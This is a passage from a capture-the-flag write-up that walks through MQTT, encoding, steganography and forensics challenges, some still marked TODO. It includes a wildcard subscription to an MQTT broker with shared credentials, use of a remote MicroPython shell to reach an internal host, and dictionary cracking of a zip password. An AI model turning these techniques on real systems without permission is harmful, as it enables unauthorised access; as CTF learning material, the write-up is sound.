falg{Y3GRJaUI2C1W4UJ9lupRTVwOXdJqo7ea}
fart{me0GHTbnSYHsuVWhYMM0gQ5kavip8xCM}
falg{6C5uNrFECHwPvDzZVqKEJa0yRklT7lip}
</code></pre>
<ul>
<li>This spams a huge amount of fake flags so I need to filer these out</li>
<li>I grepped for 'flag'</li>
</ul>
<pre><code>$ mqtt sub -t &quot;#&quot; -h 192.46.235.191 -u sensors -pw hunter2 -p 25200 | grep 'flag'

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
flag{mqtt_such_fun} DhIPIkqU0YV0
flag{mqtt_such_fun} xAacRkRMtWk1
</code></pre>
<ul>
<li>waited around 1-2 minutes and got the flag</li>
</ul>
<pre><code>flag{mqtt_such_fun}
</code></pre>
<h2>Hidden service - 200 - By ~takov751</h2>
<blockquote><p>Subchallange: Snake Did you pay attention to every straw in the haystack? 
<strong>The required micropython module is installed on the system, even if it does not show up. :wink:</strong></p>
</blockquote>
<p>There is an interesting thing in mqtt. Sometimes it prints out <code>200</code>.</p>
<pre><code>$ mqtt sub -t &quot;#&quot; -h 192.46.235.191 -u sensors -pw hunter2 -p 25200 | grep -v 'f.*{.*}'
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
200
200
200
200
</code></pre>
<ul>
<li>This could be related to a web server because 200 is an OK response code.</li>
</ul>
<p>We can try to enumerate the directory structure of the MicroPython challenge but we don't have the right permissions to do it so we need to do something else. (I tried to do it xD)</p>
<p>Do you remember what does that weird unicode crypto challenge said?</p>
<blockquote><p><em>Don't rely on the chef, cuz' he's dumb!</em></p>
</blockquote>
<ul>
<li><strong>DO NOT RELY ON ONLY ONE TOOL!</strong></li>
</ul>
<p>We can try another MQTT client:</p>
<ul>
<li><a href="https://github.com/emqx/MQTTX/releases">github.com/emqx/MQTTX/releases</a></li>
</ul>
<p>Just download the .AppImage file and make it executable (<code>chmod +x MQTT*.AppImage</code>).</p>
<p>Now you can start it! If there is an error about sandboxing you may add <code>--no-sandbox</code> for a temporary bypass for this error.</p>
<pre><code>/opt/MQTTX-1.4.2.AppImage --no-sandbox
</code></pre>
<p>Here, we should add a new connection:</p>
<p><img src="img/mqttx_new.png" alt="img/mqttx_new.png" /></p>
<p><img src="img/mqtt_setup.png" alt="mqtt_setup" /></p>
<ul>
<li>Host: mqtt://<code>192.46.235.191</code></li>
<li>Post: <code>25200</code></li>
<li>Username: <code>sensors</code></li>
<li>Password: <code>hunter2</code></li>
</ul>
<p>After we set everything up we can hit <code>Connect</code> (int the top right corner).</p>
<p>Now, we must subscribe to a topic or topics in order to get the messages.
We need to hit <code>+ New Subscription</code>:</p>
<p><img src="img/mqtt_sub.png" alt="mqtt_sub.png" /></p>
<p>A new window popped up where we have to change the Topic to <code>#</code>!</p>
<p>According to the <a href="https://mosquitto.org/man/mqtt-7.html">mqtt manual</a> this is a wildcard to get the messages from every topic on the host.
After we set it up we can hit <code>Confirm</code> in the bottom right corner.</p>
<p><img src="img/mqtt_sub_setup.png" alt="mqtt_sub_setup.png" /></p>
<p>Now, we start getting the spam again but after some time we will get the 200 one again but now we know the topic of the messages because of the different tool!</p>
<p><img src="img/mqtt_200.png" alt="mqtt_200.png" /></p>
<p>We can search in this application by hitting the three dots on the top right then <code>Search</code>. After that there are two fields (topic, message).
Since we know the message (<code>200</code>) we can search for it!</p>
<p><img src="img/mqtt_search.png" alt="mqtt_search.png" /></p>
<pre><code>Topic: /web/status/server.mqtt QoS: 0
200
</code></pre>
<ul>
<li>The topic is <code>/web/status/server.mqtt</code></li>
</ul>
<p>After some time I realized that the cli tool can do the same with verbose mode.... I'm a bit reeeee xD</p>
<p>We just need to pass <code>-v</code> to enable verbose mode like in every other open-source project.</p>
<pre><code>$ mqtt sub -t &quot;#&quot; -h 192.46.235.191 -u sensors -pw hunter2 -p 25200 -v | grep -v 'f...{.*}'
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
Client 'UNKNOWN@192.46.235.191' sending CONNECT MqttConnect{keepAlive=60, cleanStart=true, sessionExpiryInterval=0, simpleAuth=MqttSimpleAuth{username and password}}
Client 'UNKNOWN@192.46.235.191' received CONNACK MqttConnAck{reasonCode=SUCCESS, sessionPresent=false, assignedClientIdentifier=auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1, restrictions=MqttConnAckRestrictions{receiveMaximum=65535, maximumPacketSize=268435460, topicAliasMaximum=10, maximumQos=EXACTLY_ONCE, retainAvailable=true, wildcardSubscriptionAvailable=true, sharedSubscriptionAvailable=true, subscriptionIdentifiersAvailable=true}}
Client 'auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1@192.46.235.191' sending SUBSCRIBE MqttSubscribe{subscriptions=[MqttSubscription{topicFilter=#, qos=EXACTLY_ONCE, noLocal=false, retainHandling=SEND, retainAsPublished=false}]}
Client 'auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1@192.46.235.191' received SUBACK MqttSubAck{reasonCodes=[GRANTED_QOS_2], packetIdentifier=65526}
200
Client 'auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1@192.46.235.191' received PUBLISH ('200') MqttPublish{topic=/web/status/server.mqtt, payload=3byte, qos=AT_MOST_ONCE, retain=false}
</code></pre>
<ul>
<li>Message: <code>200</code></li>
<li>Topic: <code>/web/status/server.mqtt</code></li>
</ul>
<p>The next part was a little guessy in my opinion but the point is that <strong>you need to make a request to this internal domain</strong> <code>server.mqtt</code> with MicroPython.</p>
<p>As the hint suggests (<em>The required micropython module is installed on the system, even if it does not show up.</em>) there could be a requests module installed!</p>
<ul>
<li><a href="https://makeblock-micropython-api.readthedocs.io/en/latest/public_library/Third-party-libraries/urequests.html">makeblock-micropython-api.readthedocs.io/en/latest/public_library/Third-party-libraries/urequests.html</a></li>
</ul>
<p>Works like the normal requests module:</p>
<p>From the docs:</p>
<pre><code>import urequests
res = urequests.get(url='http://server.mqtt/')
print(res.text)
</code></pre>
<p>Trying out on the server:</p>
<pre><code>$ nc 192.46.235.191 2333
MicroPython v1.13-268-gf7aafc062-dirty on 2020-12-28; linux version
Use Ctrl-D to exit, Ctrl-E for paste mode
&gt;&gt;&gt; import urequests
import urequests
&gt;&gt;&gt; res = urequests.get(url='http://server.mqtt/')
res = urequests.get(url='http://server.mqtt/')
&gt;&gt;&gt; print(res.text)
print(res.text)
flag{h1dd3n_fl4g_t3ll_n0_0n3}
&gt;&gt;&gt;
</code></pre>
<pre><code>flag{h1dd3n_fl4g_t3ll_n0_0n3}
</code></pre>
<p><strong><em>Takeovers:</em></strong></p>
<ul>
<li><strong>DO NOT RELY ON ONLY ONE TOOL</strong></li>
<li>Always think out of the box (<code>http://server.mqtt</code>, <code>urequests</code>)</li>
<li>Keep Calm and Try Harder! ;)</li>
</ul>
<h1>4. Cryptography challenges</h1>
<h2>Thats a lotta encoding - 100 - By ~\M4t35Z</h2>
<blockquote><p>U have to reverse this encoded string</p>
</blockquote>
<p>Hints:</p>
<ul>
<li>It's only 5 ;)</li>
<li>Best to use burp here :D</li>
<li>Here's a screenshot I hope it helps a littlebit :D
  <img src="chall/pic-selected-200212-1947-44.png" alt="" /></li>
</ul>
<p>File: <a href="chall/thatsalottaencoding.txt">thatsalottaencoding.txt</a></p>
<p>Source:</p>
<pre><code>&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x42;&amp;#x6a;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x59;&amp;#x6a;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x57;&amp;#x59;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x46;&amp;#x6d;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x5a;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x57;&amp;#x59;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x57;&amp;#x59;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x77;&amp;#x5a;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x78;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x54;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x42;&amp;#x6c;&amp;#x4d;&amp;#x54;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x45;&amp;#x77;&amp;#x4d;&amp;#x44;&amp;#x41;&amp;#x77;&amp;#x4d;&amp;#x57;&amp;#x51;&amp;#x3d;
</code></pre>
<ul>
<li>Looks like html entities</li>
</ul>
<p>Let's use burp decoder to decode it!</p>
<p>Decoding:</p>
<ul>
<li>HTML:
  <code>
  MTAwMTEwMTAwMDBjMTAxMDAxMTAwMTAxMTEwMDExYjExMDExMDEwMDExMTEwMDAxMWYxMTExMTAwMDEwMTEwMTExMTExMTAwMDFmMTEwZDEwMTAxMTExMTExMDAxMTEwMTEwMTExMTAxMTExMTAxMDEwMDExMWYxMDAwMTExMTExMTEwMTExMWYxMDAwMDAxMDAwZTEwMDExMTAwMTEwMTAwMTExMTAxMDExMDEwMTAwMTExMTAwMDExMDExMTAwMTEwMDAwMDEwMDBlMTAwMDEwMDAwMWQ=
  </code></li>
<li>BASE64:
  <code>
  10011010000c101001100101110011b110110100111100011f111110001011011111110001f110d101011111110011101101111011111010100111f10001111111101111f1000001000e1001110011010011110101101010011110001101110011000001000e1000100001d
  </code></li>
<li>BINARY:
  <code>
  1232c170355b223715f16300017f6d377751060135f73711f520e22071507627206152e545d
  </code></li>
<li>OCTAL:
  <code>
  666c61677b75725f3768335f6d34353733725f30665f336e637279703731306e357d
  </code></li>
<li>ASCII HEX:
  <code>
  flag{ur_7h3_m4573r_0f_3ncryp710n5}
  </code></li>
</ul>
<p><img src="img/thats_a_lotta_encoding_flag.png" alt="thats_a_lotta_encoding_flag.png" /></p>
<h2>xrypto xhallenge - 100 - By ~T4r0</h2>
<blockquote><p>They told me this is the flag but it doesn't work for me:</p>
</blockquote>
<blockquote><p><code>w}pvjH!dNv!eN|&quot;N%}}Ni!cuNdaNsc!l</code></p>
</blockquote>
<ul>
<li>The name is a hint to <strong>XOR</strong></li>
<li>Open <a href="https://gchq.github.io/CyberChef/">gchq.github.io/CyberChef/</a></li>
<li>Paste the encrypted text!</li>
<li>Search for <code>XOR</code></li>
<li>Use <code>XOR Brute Force</code></li>
</ul>
<p><img src="img/xcrypto_flag.png" alt="xcrypto_flag.png" /></p>
<pre><code>Key = 11: flag{Y0u_g0t_m3_4ll_x0rd_up_br0}

flag{Y0u_g0t_m3_4ll_x0rd_up_br0}
</code></pre>
<h2>Seriously, what the fck is this? -  100 - By ~T4r0</h2>
<p>File: <a href="chall/message.txt">message.txt</a></p>
<ul>
<li>Looks like JSFuck</li>
<li>Search for jsfuck decoder</li>
<li><a href="https://lelinhtinh.github.io/de4js/">lelinhtinh.github.io/de4js/</a></li>
<li>Paste the contents to the page</li>
<li>Select JSFuck</li>
</ul>
<p><img src="img/jsfuck_flag.png" alt="jsfuck_flag.png" /></p>
<pre><code>alert('flag{JS_c4n_b3_r34lly_ugly}')
</code></pre>
<pre><code>flag{JS_c4n_b3_r34lly_ugly}
</code></pre>
<h2>Baseically everything the cook prepared - 100 - By ~T4r0</h2>
<pre><code>9l&lt;EY;HHJ(@X;07&lt;`iB[@5CV5&gt;&quot;;%K&lt;)lt#:,&gt;4T;J^;,A6*5?@;J8-;,ft?=%+iB&gt;&amp;.q1@7Y&amp;f@n&amp;dV@9-9I;J]Jm=_q8;=))D,@95EB&lt;,Q5==%7&quot;K@n0Qd=_go\@VTC.&gt;#[g[:/s/h@7&lt;X?9epX5&lt;)mU2&lt;(1aq&gt;&amp;%);;a`r/ASbmS=)E#&amp;:,5Nu@X;^.;gN+U;--Li@r-*_;eo5d=aFj=;JoB,;JUAi@ocK(&lt;%r!,=%H([A5uZ$
</code></pre>
<ul>
<li>The name is a hint to <strong>BASEn</strong> encoding</li>
<li>Open <a href="https://gchq.github.io/CyberChef/">gchq.github.io/CyberChef/</a></li>
<li>Paste the challenge text</li>
<li>Search for base</li>
<li>Start from Base85 and Go down to Base32</li>
</ul>
<p><img src="img/baseically_everything.png" alt="baseically_everything.png" /></p>
<p>Base85 --&gt; Base64 --&gt; Base62 --&gt; Base58 --&gt; Base32</p>
<pre><code class="language-   ">flag{Gr34t_y0u_f0und_wh4t_th3_ch3f_w4s_c00k1ng!}
</code></pre>
<h2>ham, pork, and - 100 - By ~T4r0</h2>
<blockquote><p>For this challenge, you need to modify the flag a bit to get the usual format.
Just add the { and } characters after you solved it, no other step required.</p>
</blockquote>
<pre><code>AABABABABAAAAAAAABBAAAAABAAAAAAAABAABBABABBAAABABBABAAAAABBAAABBBBAABAABBAAABBABBAABAAAAABAABAAAABBBAABAAAAAAAABABABAABAAABBBBABBAAAAABBAABBBAABAABAAABAABABAAABAAABBAABAAABABAABAAAAAABAABAAAABBABBAABBBAAAB
</code></pre>
<ul>
<li>Open it in <a href="https://gchq.github.io/CyberChef/">gchq.github.io/CyberChef/</a></li>
<li>Use <code>Magic</code> and it shows it's a <strong>Bacon Cipher</strong></li>
</ul>
<p>But it's still not the flag</p>
<ul>
<li>Let's change the <code>Alphabet</code> option in cyberchef from <strong>Complete</strong> to <strong>Standard</strong></li>
<li>And we got the flag!!</li>
</ul>
<p><img src="img/ham_pork_and_flag.png" alt="ham_pork_and_flag.png" /></p>
<pre><code>FLAGBACONMIGHTNOTBEHEALTHYBUTITSDELICIOUS
FLAG{BACONMIGHTNOTBEHEALTHYBUTITSDELICIOUS}
</code></pre>
<h2>You hear that, Mr. Anderson? - 200 - By ~TheFocusDev</h2>
<blockquote><p>If you haven't, join our discord server and talk to our discord bot called Agent Smith. To talk to him, you have to message him in a private message, and use the .chall<em></em> prefix before every message.</p>
</blockquote>
<blockquote><p>Here is an invite to discord: <a href="https://discord.gg/eKxYjbV">discord.gg/eKxYjbV</a></p>
</blockquote>
<ul>
<li>TODO</li>
</ul>
<h2>Domino - 250 - By ~T4r0</h2>
<blockquote><p>domino
(The flag for this challenge is in Hungarian, to make solving it easier!)</p>
</blockquote>
<p>File: <a href="chall/domino.txt">domino.txt</a></p>
<ul>
<li>TODO</li>
</ul>
<h2>Raid - 250 - by ~D3V</h2>
<blockquote><p>Our DNS servers have been raided by state law enforcement groups. Maybe they left a flag somewhere or something?</p>
</blockquote>
<p>Do you remember the Data Number Structure warmup challenge?</p>
<pre><code>$ dig txt t4ks3c.xyz

; &lt;&lt;&gt;&gt; DiG 9.16.8-Debian &lt;&lt;&gt;&gt; txt t4ks3c.xyz
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 61413
;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;t4ks3c.xyz.			IN	TXT

;; ANSWER SECTION:
t4ks3c.xyz.		793	IN	TXT	&quot;cia 123.97.115.99&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;v=spf1 a mx ~all&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;ZmxhZ3sxVFNfNExMVzRZU19ETlN9Cg==&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;fszb 125.255.255.255&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;fbi 49.49.95.114&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;mosad 117.108.51.122&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;nki 102.108.97.103&quot;

;; Query time: 11 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Sun Jan 17 10:03:54 CET 2021
;; MSG SIZE  rcvd: 269
</code></pre>
<ul>
<li>Since this is crypto we must decode something!</li>
<li>But the base64 stuff is already gone :/</li>
<li>We left with those ip addresses and National Agency organizations :D</li>
</ul>
<pre><code>cia 123.97.115.99
fszb 125.255.255.255
fbi 49.49.95.114
mosad 117.108.51.122
nki 102.108.97.103
</code></pre>
<pre><code>cia fszb fbi mosad nki
</code></pre>
<ul>
<li>I couldn't get anything useful from this</li>
</ul>
<p>Messing with the numbers:</p>
<ul>
<li>Remove the dots(highlight the whole block in visual mode (V), then hit <code>:s/\./ /g</code>)</li>
</ul>
<p>And this turns to:</p>
<pre><code>:'&lt;,'&gt;s/\./ /g
</code></pre>
<pre><code>123 97 115 99
125 255 255 255
49 49 95 114
117 108 51 122
102 108 97 103
</code></pre>
<pre><code>123 97 115 99 125 255 255 255 49 49 95 114 117 108 51 122 102 108 97 103
</code></pre>
<ul>
<li>Paste it into <a href="https://gchq.github.io/CyberChef/">gchq.github.io/CyberChef/</a></li>
</ul>
<p>We get:</p>
<pre><code>{asc}ÿÿÿ11_rul3zflag
</code></pre>
<ul>
<li>Those weird y's are because of 255's so just delete those</li>
</ul>
<pre><code>123 97 115 99 125 49 49 95 114 117 108 51 122 102 108 97 103
</code></pre>
<p>We got:</p>
<pre><code>{asc}11_rul3zflag
</code></pre>
<ul>
<li>We can see there is the flag but in the wrong order</li>
</ul>
<p>Just play with it and you will get it ;)</p>
<pre><code>flag{asc11_rul3z}
</code></pre>
<h2>Beeping bot - 250 - By ~takov751 and T4r0 and D3v</h2>
<blockquote><p>Yesterday my bot started beeping randomly. Please help!</p>
</blockquote>
<blockquote><p>If you haven't, join our discord server. To complete this challenge, you have to join voice chat, the <code>#Discord challenge 2</code> channel.
To invite the bot to voice, type: <code>?chall_2</code> to the <code>#discord_flag</code> channel.
The challenge flag has the character <code>&amp;</code> instead of <code>{</code> and <code>}</code>, so replace those accordingly before submitting the flag.</p>
</blockquote>
<blockquote><p>Here is an invite to discord: <a href="https://discord.gg/eKxYjbV">discord.gg/eKxYjbV</a></p>
</blockquote>
<p>You have to go into the room, spawn the bot while you are recording the audion.</p>
<ul>
<li><p><a href="chall/recorded.ogg">recorded.ogg</a></p>
</li>
<li><p>Open the file in <code>audacity</code></p>
</li>
</ul>
<p>You needed to know there is an older encryption type than morse and its name is <strong><em>BAIN</em></strong>.</p>
<p><img src="chall/bain.jpg" alt="bain.jpg" /></p>
<pre><code>.--- .... .- .-.. ---- .-. ....- .---- ..-- .---- -.. -.- ....- .---- ..-- ----
</code></pre>
<p>Decoding manually:</p>
<p><img src="img/bain_decoding.png" alt="bain_decoding.png" /></p>
<p>...</p>
<pre><code>FLAG&amp;B41N1SP41N&amp;
</code></pre>
<p>Replace <code>&amp;</code>'s with <code>{</code>,<code>}</code>:</p>
<pre><code>FLAG{B41N1SP41N}

flag{b41n1sp41n}
</code></pre>
<h2>Back to BASEics - 250 - By ~dovahkiin0424</h2>
<blockquote><p>I've recived this strange message. Can you decode it?</p>
</blockquote>
<p>Hint:</p>
<ul>
<li>Don't rely on the chef, cuz' he's dumb!</li>
</ul>
<p>File: <a href="chall/m3ss4g3.txt">m3ss4g3.txt</a></p>
<ul>
<li>TODO</li>
</ul>
<h1>5. Steganography challenges</h1>
<h2>WEEEEEEEEEEEEEEEEEEE - 100 - By ~T4r0</h2>
<blockquote><p>Feelin a bit dizzy</p>
</blockquote>
<p>File: <a href="chall/weeeeeeeeeeeeeee.png">weeeeeeeeeeeeeee.png</a></p>
<p><img src="chall/weeeeeeeeeeeeeee.png" alt="weeeeeeeeeeeeeee.png" /></p>
<ul>
<li>There is a <strong>swirl</strong> effect on this image!</li>
</ul>
<p>The easiest way is to use a cli tool here which name is <code>convert</code>.
It's a part of the ImageMagick package.</p>
<p>Just search for <code>imagemagick swirl</code> in your browser and you will find this page:
<a href="https://legacy.imagemagick.org/Usage/warping/">legacy.imagemagick.org/Usage/warping/</a></p>
<ul>
<li>This described the usage of swirl too! <a href="https://legacy.imagemagick.org/Usage/warping/#swirl">legacy.imagemagick.org/Usage/warping/#swirl</a></li>
</ul>
<p>Example:
<pre><code>$ convert koala.gif -swirl 180 swirl.jpg
</code></pre>
</p>
<p>Let's try it on the challenge!
<pre><code>$ convert chall/weeeeeeeeeeeeeee.png -swirl 180 out.png
</code></pre>
</p>
<p><img src="img/swirled180.png" alt="img/swirled180.png" /></p>
<ul>
<li>This is not enough!</li>
</ul>
<p>We need more swirling:
<pre><code>$ convert chall/weeeeeeeeeeeeeee.png -swirl 700 img/swirled700.png
</code></pre>
</p>
<p><img src="img/swirled700.png" alt="img/swirled700.png" /></p>
<ul>
<li>Finally, it's readable!</li>
</ul>
<pre><code>flag{w0000sh_g035_th3_wh1rlp00l}
</code></pre>
<h2>u drunk 0r stg? - 100 - By ~\M4t35Z</h2>
<blockquote><p>Ahh maan I got this image from a random girl I met on a party.<br />
But damn this one is so messed up...<br />
May you fix it for me and give me the secret message?</p>
</blockquote>
<blockquote><p>+NOTE: Keep in mind that the flag is case sensitive!</p>
</blockquote>
<p>File: <a href="chall/challenge.png">challenge.png</a></p>
<p><img src="chall/challenge.png" alt="challenge" /></p>
<ul>
<li>Another swirl bud in the other direction :D</li>
</ul>
<pre><code>$ convert chall/challenge.png -swirl -700 img/u_drunk-700.png
</code></pre>
<p><img src="img/u_drunk-700.png" alt="u_drunk-700" /></p>
<ul>
<li><code>-700</code> is too much</li>
</ul>
<p>Try with a bit less negative swirl:</p>
<pre><code>$ convert chall/challenge.png -swirl -400 img/u_drunk-700.png
</code></pre>
<p><img src="img/u_drunk-400.png" alt="u_drunk-400.png" /></p>
<ul>
<li>The flag is readable!</li>
</ul>
<pre><code>flag{Y0u_5p1n_my_h34d_r19h7_r0und}
</code></pre>
<h2>st3gfuck - 150 - By ~dovahkiin0424</h2>
<blockquote><p>I have an image with this funny rolled cat. Maybe something is hidden in the image... Can you decode it?</p>
</blockquote>
<p>File: <a href="chall/c4t.jpg">c4t.jpg</a></p>
<p><img src="chall/c4t.jpg" alt="c4t.jpg" /></p>
<ul>
<li>TODO</li>
</ul>
<h2>Colors - 150 - By ~SyrenDuck</h2>
<blockquote><p>There is a hidden flag in this picture. Good luck.</p>
</blockquote>
<p>File: <a href="chall/colors.png">colors.png</a></p>
<p><img src="chall/colors.png" alt="colors.png" /></p>
<ul>
<li>TODO</li>
</ul>
<h1>6. Forensics challenges</h1>
<h2>capture - 100 - By ~takov751</h2>
<blockquote><p>Look what have i captured.</p>
</blockquote>
<p>File: <a href="chall/capture.pcap">capture.pcap</a></p>
<p>We have to open this capture file in wireshark in order to be able to analyze the captured traffic.</p>
<pre><code>wireshark chall/capture.pcap
</code></pre>
<p>We can see there was a request made to /flag.zip:</p>
<p><img src="img/capture1_ws_flag_zip.png" alt="" /></p>
<ul>
<li>We just need to extract this from the capture file</li>
<li>And we can easily do that in wireshark!</li>
</ul>
<p>File --&gt; Export Objects --&gt; HTTP:</p>
<p><img src="img/capture1_ws_export.png" alt="capture1_ws_export.png" /></p>
<ul>
<li>Click on <code>flag.zip</code> and click <code>Save</code></li>
</ul>
<p>Cracking the zip:</p>
<p>You can use <code>zip2john</code> then crack the hash with <code>john</code>,
but sometimes it gets fucked up so it's best to use <code>fcrackzip</code> here:</p>
<pre><code>$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt flag.zip

found file 'flag/flag.txt', (size cp/uc     34/    22, flags 9, chk 60fc)
checking pw 1nk5lave0844

PASSWORD FOUND!!!!: pw == 1337BullShit
</code></pre>
<ul>
<li>After some time(1-2 min) we get the password!</li>
</ul>
<p>Now you have to extract the zip file:</p>
<pre><code>$ 7z x flag.zip
1337BullShit
</code></pre>
<pre><code>$ cat flag/flag.txt
flag{http_n0t_s3Cur3}
</code></pre>
<h2>capture 2 - 150 - By ~T4r0</h2>
<p>File: <a href="chall/capture2.pcap">capture2.pcap</a></p>
<p>We have to open it in <code>wireshark</code> again.</p>
<p><img src="img/capture2_data.png" alt="capture2_data" /></p>
<ul>
<li>It has some data in it!</li>
</ul>
<p>RMB --&gt; Copy --&gt; Value</p>
<pre><code>1f8b080885aee95f0003666c61672e747874004bcb494caf2e372c322ece3029ca8e4f362928292d328e37aae5020075cd58381a000000
</code></pre>
<ul>
<li>Paste this into <a href="https://gchq.github.io/CyberChef/">gchq.github.io/CyberChef/</a></li>
</ul>
<p>From Hex --&gt; Gunzip</p>
<p><img src="img/capture2_flag.png" alt="capture2_flag.png" /></p>
<pre><code>flag{w1r3sh4rk_c4ptur3_2}
</code></pre>
<h3>Command line way</h3>
<pre><code>$ tshark -r capture2.pcap -e data -Tfields
1f8b080885aee95f0003666c61672e747874004bcb494caf2e372c322ece3029ca8e4f362928292d328e37aae5020075cd58381a000000
</code></pre>
<p>Hex decrypt it:</p>
<pre><code>$ echo '1f8b080885aee95f0003666c61672e747874004bcb494caf2e372c322ece3029ca8e4f362928292d328e37aae5020075cd58381a000000' | xxd -r -p &gt; exportfile
$ file exportfile
exportfile: gzip compressed data, was &quot;flag.txt&quot;, last modified: Mon Dec 28 10:08:05 2020, from Unix, original size modulo 2^32 26

$ mv exportfile exportfile.gz
</code></pre>
<ul>
<li>It's a gzip file!</li>
</ul>
<p>Extract it:</p>
<pre><code>$ gunzip exportfile.gz
$ cat exportfile
flag{w1r3sh4rk_c4ptur3_2}
</code></pre>
<ul>
<li>CLI FTW!</li>
</ul>
<h2>Firmware - 150 - By ~takov751</h2>
<blockquote><p>There is something fishy, since I updated my router. It's been acting weird lately.</p>
</blockquote>
<p>File: <a href="chall/firmware.bin">firmware.bin</a></p>
<p>We got a <code>.bin</code> file. We can try to run <code>strings</code> on it but unfortunately, it won't show anything interesting.</p>
<p>But there is a tool called <code>binwalk</code> out there which can show us what is exactly in this file.</p>
<pre><code>$ binwalk firmware.bin
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
53952         0xD2C0          U-Boot version string, &quot;U-Boot 1.1.3 (Mar 19 2018 - 15:36:42)&quot;
66560         0x10400         LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2986732 bytes
1049088       0x100200        Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 3976959 bytes, 522 inodes, blocksize: 131072 bytes, created: 2021-01-07 11:49:59
</code></pre>
<ul>
<li>It found some things that can be interesting!</li>
</ul>
<p>Now, we can use <code>binwalk</code> again to 'unpack' this file!</p>
